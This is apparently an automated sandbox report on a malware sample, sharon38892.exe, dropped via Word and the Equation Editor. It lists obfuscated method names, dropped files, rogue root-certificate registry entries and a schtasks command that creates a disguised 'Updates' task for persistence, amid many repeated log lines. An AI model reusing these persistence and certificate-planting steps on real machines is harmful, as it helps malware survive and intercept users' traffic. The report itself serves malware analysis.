Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, Kr0XM5BohuwmGLFWocb.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RJsKxQBXFP', 'Kv0KUrsh3S', 'OOPK6nEvDP', 'qhbKHWWIOO', 'lhfK9JonMJ', 'KClKIuqWoN', 'bjfKwijK07'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, ng8CCcP15peLhrjZl7.cs High entropy of concatenated method names: 'UdrVBXDRSC', 'yKkVoRq9lo', 'MU2VE79j0E', 'G7mVciP8cH', 'I31VG2iPN9', 'OsKV5oVOqI', 'ms5V8wFJ3i', 'rHRAwf5lp0', 'L5YANr6Wqg', 'fQaAOjP65o'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, gw2ephibsLpAsMI8xN.cs High entropy of concatenated method names: 'EmQvdNffj2', 'e1mvysE0C1', 'yoTvrNrH7k', 'r7jvJRuDkU', 'WOUvMnr6r4', 'hchvscqx5c', 'rL2vTsDVCQ', 'NLZvnefGAK', 'VNyvtXNHe6', 'hemvCdJbMt'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, g0tMcQgBCb6VGP169Q.cs High entropy of concatenated method names: 'JQlohUerpT', 'V1bocW9DNW', 'x3poGo6WL7', 'Nnho0eUkn3', 'sgwo5dFMxG', 'oZao8wkl06', 'GoAovQtvQx', 'UO9ogCt8ad', 'UepoDXtDVH', 'pr3oRXPq14'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, nGq4u2GTAdEScdFQ9J.cs High entropy of concatenated method names: 'Dispose', 'MPoBOnl9lv', 'cnCW4Buk5c', 'Xtj33RPJUP', 'IUTBPnPTDW', 'DMiBzffqYh', 'ProcessDialogKey', 'nLBWF9j79n', 'zpIWBpE4Fq', 'JJQWWfg8CC'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, RTnPTDNWTMiffqYhfL.cs High entropy of concatenated method names: 'vWwAcdIsCS', 'TDbAGhIjTP', 'dJfA0LgRyn', 'kwQA5aN7sC', 'uGhA8S7Ptf', 'KItAvLgUUF', 'HF0AgmjEIC', 'cboAD38o15', 'uRsARo9Eac', 'Eb4AQRMRBT'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, M2V7tMHwBcrZuxvNAK.cs High entropy of concatenated method names: 'WEl2RbRhV0', 'OBE2QAeJqM', 'ToString', 'fnD2cI8Yh4', 'Nw62GMaDDw', 'PF320vLGAp', 'UPL25VvRY1', 'L9S28m13uC', 'wD12vCw1to', 'Uff2glApHd'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, ODTKZhCDXOLTgeK3dg.cs High entropy of concatenated method names: 'Ode5M1wJnb', 'HI95TyHHP5', 'FTX0mffRBi', 'x890pE0Ewj', 'ImF0ZhOrEA', 'vKj0uJM1Gi', 'Pns0bruOCo', 'NH701icxel', 'kpC0ivR8D6', 'puK0l4xKtv'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, hxLwNxnckfXAmWXICd.cs High entropy of concatenated method names: 'QH9GxEpeWh', 'MAJGUgO9sQ', 'ppBG6gmAZF', 'f9fGH67Lls', 'f0bG9XNQAa', 'O9kGIyEjgF', 'eSmGw6OEXK', 'QvmGNH5LO1', 'thtGOwX21n', 'Q6GGPQtWBf'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, mZ7saqjYtSTEYbUQUZ.cs High entropy of concatenated method names: 'eaXfndPrEB', 'amwftCg7vF', 'brFfkJBi8c', 'rtGf4Dy8j1', 'Tl9fpdavrR', 'Un2fZKGYY1', 'DsrfbsyVOH', 'Buff1c0tRY', 'm3XfliN9m0', 'ejpf3I2nMU'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, LZFdEvIIaEZUtISyW2.cs High entropy of concatenated method names: 'yE62NBDpDb', 'i642Pj4o2H', 'OwuAFLsIjL', 'k3YAB1wmAM', 'yBn23lAukL', 'FjO2Su8aHU', 'gG32jHCNMH', 'x1l2xh4LFn', 'fgq2UQthSM', 'axX26i9qwf'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, YLiES1WHhaRR217u52.cs High entropy of concatenated method names: 'keZrISNbU', 'aFFJBnYdE', 'NiksSADgL', 'qwpTnCGax', 'sRDtAPoLT', 'BQbCI5fdx', 'zp5c8vSJQwQdvPHVjF', 'hNv8cujWHIVldHOypn', 'jj8A9qFC0', 'LAbKKZWF4'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, xrnWZGksLgoJo1blU6.cs High entropy of concatenated method names: 'HMk8hZMJbV', 'Iqk8G3laAw', 'JlC85w5rS6', 'TAa8vtR0rF', 'Vi18gfwJG3', 'hBa593rObE', 'edV5IkLZPQ', 'aVt5wHi7NQ', 'ovP5NmCMn9', 'K3c5ObdAh8'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, KGUs3stbrGgGYvjjTY.cs High entropy of concatenated method names: 'NLJ0J1bxVO', 'qSj0s706nF', 'LYJ0nTQXXe', 'z6V0teRyji', 'wDO0YTbNaT', 'AoW0atQBND', 'Dfc02dwMma', 'x0y0AGboRT', 'TT10VjQoNK', 'O8c0KfTcLo'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, M5wBeyzXs6BolJjqtJ.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oJRVf1M9Zg', 'uNjVY9ixYp', 'NgrVawuR2C', 'Gf1V22STUI', 'cV3VASNyqR', 'btTVVLLi84', 'a1LVKpR1B7'

Persistence and Installation Behavior

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File created: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File created: C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy) Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharonzx[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\sharon38892.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
